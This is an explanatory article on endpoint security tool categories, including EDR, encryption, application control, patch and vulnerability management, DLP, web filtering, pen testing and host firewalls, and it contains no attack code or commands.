Endpoint detection and remediation (EDR) solutions continuously inspect files and applications that enter a device to extend protection beyond simple signature-based threats. This includes protecting against some types of ransomware, zero-day threats, fileless malware, and more advanced attacks. In contrast to EPP solutions, EDR solutions can provide a deeper level of advanced threat analysis and forensics, and they play a bigger role in containing and responding to a security incident or breach event once it has already occurred. However, one of the drawbacks of EDR solutions can be a high number of false positives and security alerts.

Encryption is an essential feature for both data security and endpoint security. Simply defined, encryption is the process of encoding data (including passwords) so that it is unreadable and unusable unless the possessor of the data has the correct decryption key. As encryption cracking tools have become more powerful, encryption methodologies have had to evolve. While encryption capabilities are important components of many endpoint security solutions (PAM, DLP, endpoint firewalls) as well as natively on device firmware and software, there are also standalone solutions designed to encrypt endpoint data. Endpoint encryption software typically either protects individual files, or is applied across the entire hard drive, known as full disk encryption.

Application control solutions protect endpoints, most commonly end-user devices and servers, from executing unauthorized applications. Traditionally, these solutions make use of allow lists (whitelists), block lists (blacklists), and greylists. Greylisted applications are applications that have been identified, but have not been added to allow or block lists. Special security rules may be put in place so that greylisted applications can run in some circumstances, as needed.

Application control solutions may also be able to enforce granular control over application usage—such as allowing a particular user/endpoint to execute a certain subfunction of an application, while disabling or blocking the execution of other application functions for that user/endpoint. Cloud-based reputation services may also be leveraged to determine whether or not an application is safe to run. Application control can be sold as a point solution, or be included in other platforms, such as endpoint privilege management, or next-generation firewalls (NGFWs). Integration within these other platforms often allows for natural augmentation of the capabilities that provide advanced application protection. Application control solutions must be finely calibrated to enable seamless use of authorized applications for legitimate use cases, while preventing against malware, ransomware, and other threats.

Patch management solutions automate the process of downloading patches, identifying the endpoints, applications, or other software that need the patches, and then—usually after testing of the patches and if then given verification from a human—applying the patches. While patches may need to be manually applied in some instances, automating the process as much as possible helps organizations scale to meet the thousands of vulnerabilities across their endpoint estate. When dealing with a dangerous vulnerability for which an exploit already exists in the wild, time is of the essence, so automation is key. Patch management is a core part of vulnerability management and is often tightly integrated with enterprise vulnerability management solutions.

Vulnerability management (VM) solutions provide a proactive approach to discovering, analyzing, and remediating vulnerabilities. Drawing from vulnerability databases (CVE, etc.) these solutions perform vulnerability scans that deliver a snapshot of the vulnerabilities found across the endpoint environment. VM solutions put context around the risk that helps the organization evaluate the scope and level of risk posed by the threat, weighing that against the mitigation options for the vulnerability. Vulnerability scans generally only represent a moment-in-time snapshot, though some scans that are low-impact on resources may run continuously. Scans often need to run on sensitive resources that require privileged access. These are called credentialed scans as they require injection of credentials to be run. Due to the highly sensitive and privileged nature of such scans, the credentials should be injected into the VM solution using an enterprise privileged credential management solution. Credentialled scans tend to uncover more dangerous threats than credential scans. While the vulnerability scanning processes themselves can be highly automated and, depending on the solution, scale across the entire IT infrastructure, human input is typically required to ultimately determine and initiate the best course of action. Of course, most vulnerability management solutions are dependent on databases of known vulnerabilities (signatures) and provide limited, if any, protection against zero-day threats. A good vulnerability management tool should be continuously updated with the latest vulnerability signatures.

Web filtering solutions, which can include URL filtering and more, put controls around the sites that users can access via their browsers and help mitigate the human element in threats. Organizations can block content by category and/or blacklist certain URLs. Employees reaching a blocked page will typically see a message informing them why access to the request page has been restricted. Web filtering solutions can protect endpoints from visiting malicious sites that pose a risk of infection. Web filtering can also block content that a company deems inappropriate, which in some settings, such as k-12 schools, may be required by compliance.

Data Loss Prevention (DLP) solutions aim to prevent leakage or unauthorized transmission of data. DLP analyzes context and content to help ensure only the right individual or systems can access the data. Some use cases for DLP include preventing a user from:

  • Uploading or downloading unauthorized information from a USB
  • Accessing a sensitive file attachment in an email when using a personally-owned device
  • Emailing a sensitive document (such as containing financial results) to an individual who is not authorized to receive it
  • Inappropriately sharing sensitive content with a teammate or other individual over a messaging app—even if the app itself is authorized by the organization

DLP can be deployed across many types of endpoints and systems, including end-user devices, servers, and gateways, and is an important endpoint data protection technology. DLP leverages encryption and uses rules-based structure, database fingerprinting, and other techniques to make fast, accurate decisions about the legitimacy of data access requests. DLP solutions can also send alerts of inappropriate data access requests to the appropriate IT or compliance personnel.

Penetration (Pen) Testing solutions allow security teams and researchers to simulate attacks against an environment and probe for potential vulnerabilities to provide information useful to hardening the organization’s defenses. Pen testing is a highly proactive methodology that is part of an overall vulnerability management program. Some vulnerability management solutions may have built-in pen testing features. Pen testing is a useful way to find potential threats that other tools may miss, or just to better understand how potential changes to IT infrastructure and endpoint configurations could create new attack pathways.

Endpoint firewalls/host-based firewalls are software that runs on endpoints. This is in contrast to the types of firewalls (stateful, packet filtering, next-generation, etc.) more closely associated with network security. Endpoint firewalls are sometimes referred to as “personal firewalls” and they may be installed on and protect desktops, laptops, and servers. Endpoint firewalls inspect traffic, apply rules, and may even be able to perform behavioral monitoring to protect the endpoint from malware and attacks originating either within or outside of the corporate network. A web application firewall (WAF) is a subtype of endpoint firewalls and is used to protect endpoint-hosted applications and web services, such as WordPress, from SQL injections and other malicious attacks.

Anti-spyware detects, prevents, and removes unwanted software, including adware. While organizations tend to purchase anti-spyware (if they purchase it at all) as an add-on module to their anti-virus solutions, standalone software also exists, but is generally consumer-grade.

Evolving to Modern Endpoint Security

Endpoint security has evolved considerably over the last several decades—from simple, signature-based antivirus software to a holistic strategy and technology stack designed to protect against known or unknown threats to endpoints. Today, endpoint security is necessary to prevent, contain, mitigate, and remediate external and internal threats, and scale to meet the growing diversity of devices whether on-premise or remote, employee, or vendor. It also needs to be forward-looking so it can accommodate an evolving IT and threat environment withstand new tests, such as the high-velocity attacks that could soon emerge as 5g becomes more widespread. Most importantly, your endpoint security technology stack should be built with solutions that communicate and collaborate with each other, as well as with your broader IT and IT security ecosystem.